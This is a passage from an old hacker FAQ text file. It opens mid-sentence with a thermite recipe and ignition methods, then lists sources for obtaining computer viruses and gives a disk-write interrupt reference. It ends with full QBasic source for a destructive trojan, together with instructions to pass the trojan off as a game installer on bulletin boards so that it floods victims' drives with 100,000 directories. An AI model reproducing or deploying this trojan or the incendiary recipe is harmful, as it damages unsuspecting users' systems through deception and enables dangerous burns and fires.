approx. 2200 deg C) and can be used to burn through most anything. Materials: powdered aluminum, powdered iron oxide Procedure: mix the two powders together as evenly as possible Ignition: thermite is difficult to ignite but these work a) mix a small amount of potassium chlorate into the thermite mixture and ignite with a few drops of sulfuric acid b) magnesium strip or 'sparkler' stuck into the powder which is then lit as a fuse ===================================================================== V. Infection (Virii, Trojans, Worms and other creepy crawlies) WHERE CAN I GET SOME VIRII? The Virus eXchange BBS in Bulgaria. [number not available - :( ] Problem: They demand a virus they don't have in their archives to let you in. Good luck finding one. The best way is to write one, even if it's in BASIC. It'll probably get you in. They have THOUSANDS of virii. IBM, Mac, Amiga, ... And they accept 2400 bps from what I know! For more info, gopher to and dig around in their online library under technical info. There are alot of places in the US to get virii too: The Hell Pit in Chicago has over 1500, and they don't accept the lame stuff like the ones written in basic, so they're all good ones. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ INTS USED: (from Belisarius) You want Int 18h, AH=03h, Al==Num sectors to write BX==offset of pointer to buffer CH=cylinder Number Cl=sector number DX=head number Dl=drive numbers ES=segment of pointer with buffer for CH=it's the low 8 bits of 10 bit cylinder number, for CL=cylinder/sector number, bits 6,7=cylinder number(high 2 bits), 0-5=sector number. for DL=bit 7 = 0 for floppy, 1 for fixed drive upon return: AH=status, AL=number of sectors written flags, carry set if an error. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ SAMPLE OF A TROJAN (from Spear) This is a little trojan I wrote in Qbasic 4.5 It's a bitch! REM bitch by Spear color 14,0 print"installing datafiles... Please wait..." print"This may take up to 20 minutes, depending on your computer..." shell "cd\" for a = 1 to 100000 a$=str$(a) c$="md" + a$ + ".hee" shell c$ next a cls print"Cybermattixx Version 1.0 is now installed on your system..." print"Have a shitty day!" print " ?AM?" print input "Hit ENTER To REBOOT your System now!";a$ shell "" How to use it? This can pose as the installation program for a game. This means that when you upload it to a BBS or something, and post that it is a kickass game, people will download it and try to install it on their computers! What does it do? This program changes directory to the root and makes 100000 dirs in the root. You cannot use deltree to wipe them out in one chunk and you CANNOT get rid of them without doing reverse engineering on the program, ie. rd instead of md. To get rid of them any other way you would have to format c: or d: -=-=-=-=-=-=-=-=-=-=-=-=-=- END of HAQ1.07/1 -=-=-=-=-=-=-=-=-=-=-=--=